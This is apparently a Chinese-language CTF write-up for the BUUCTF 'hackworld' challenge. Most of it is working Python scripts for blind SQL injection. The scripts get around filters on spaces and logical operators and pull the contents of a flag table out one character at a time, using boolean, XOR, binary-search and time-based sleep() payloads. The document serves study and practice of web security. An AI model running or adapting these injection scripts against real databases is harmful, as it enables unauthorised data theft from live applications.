2. it
  3. 脚本学习(1)

脚本学习(1)

mac2026-06-07  6

hackworld(盲注,这里可以使用时间,布尔)

根据一波手动测试,知道过滤了&,||,and,or,for,空格,等等; 测试的时候,除了被检验出来的注入,还存在Error Occured When Fetch Result. 和 Hello, glzjin wants a girlfriend. 两种页面,(其实还有一种直接bool(false) 的页面) 所以尝试布尔注入: -1=(23<231)

-1=(23>231)

的确存在布尔报错,好,上脚本: 自己写的极慢的垃圾脚本:

import requests import re s='' url="http://040e26d3-7560-45ab-9050-a5feb7312017.node3.buuoj.cn/index.php" for n in range(1,16): for m in range(31,127,1):#31 127 id="-1=(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))"%(n,m) r=requests.session() m1=r.get(url) if m1: exp={"id":id} f=r.post(url,data=exp) content=f.text #print content #print m if "Hello, glzjin wants a girlfriend." in content: print chr(m) s+=chr(m) else: print "no" print "flag is:"+s

异或:

import requests import re s='' url="http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php" for n in range(1,16): for m in range(31,127,1):#31 127 id="1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))"%(n,m) r=requests.session() m1=r.get(url) if m1: exp={"id":id} f=r.post(url,data=exp) content=f.text #print content #print m if "Hello, glzjin wants a girlfriend." in content: print chr(m) s+=chr(m) else: print "no" print "flag is:"+s

放个大佬的二分查找脚本:

#!/usr/bin/python #-*-coding:utf-8 -*- import requests import re def flag_get(start,f,url): #确定start位的字符 a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))='+str(f)+'),0,1))' data = {'id': a } url = 'http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php' r= requests.post(url, data) s=r.text #print(s) if 'Hello' in s: return 1 else: return 0 def flag_find(start,f,url): #确定 a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))>'+str(f)+'),0,1))' data = {'id': a } url = 'http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php' r= requests.post(url, data) s=r.text #print(s) if 'Hello' in s: return 1 else: return 0 if __name__ == '__main__': url = 'http://d2ad4c33-80b3-44c6-9dfb-2662d250a5fe.node3.buuoj.cn/index.php' flag_kouhao=125 flag='' num=1 #从第num位开始爆破 while 1: start=32 #ascii的起始范围(10进制) last=126 #ascii的终止范围(10进制) mid=int((start+last)/2) while 1: if(flag_get(num,flag_kouhao,url)): flag=flag+'}' print('flag is :'+flag) exit(1) print('strat is '+str(start)) print(' mid is '+str(mid)) print('last is '+str(last)) print('****************************************') if(flag_find(num,mid,url)): start=mid mid=int((start+last)/2) if ((last-start)<5): break else: last=mid mid=int((start+last)/2) if ((last-start)<5): break print(start) print(last) print('****************************************') for i in range(start,last+1): print(i) if(flag_get(num,i,url)): f=chr(i) flag=flag+f print('****************************************') print(' num is '+str(num)) print('char is '+f) print('flag is '+flag) print('****************************************') break num=num+1 print(flag)

时间盲注:

大佬脚本:

import requests def six_six_six(url): flag = '' while True: for i in 'abcdefghijklmnopqrstuvwxyz0123456789{}_-': data = {'id':"sleep((select(flag)from(flag)where(flag)like('f%'))like('{i}%'))".format(i=flag+i)} print(data) try: requests.post(url=url,data=data,timeout=1) except: flag=flag+i print('[*]%s'%flag) break if i=='}': break print('[+]%s'%flag) url = 'http://040e26d3-7560-45ab-9050-a5feb7312017.node3.buuoj.cn/index.php' six_six_six(url)
最新回复(0)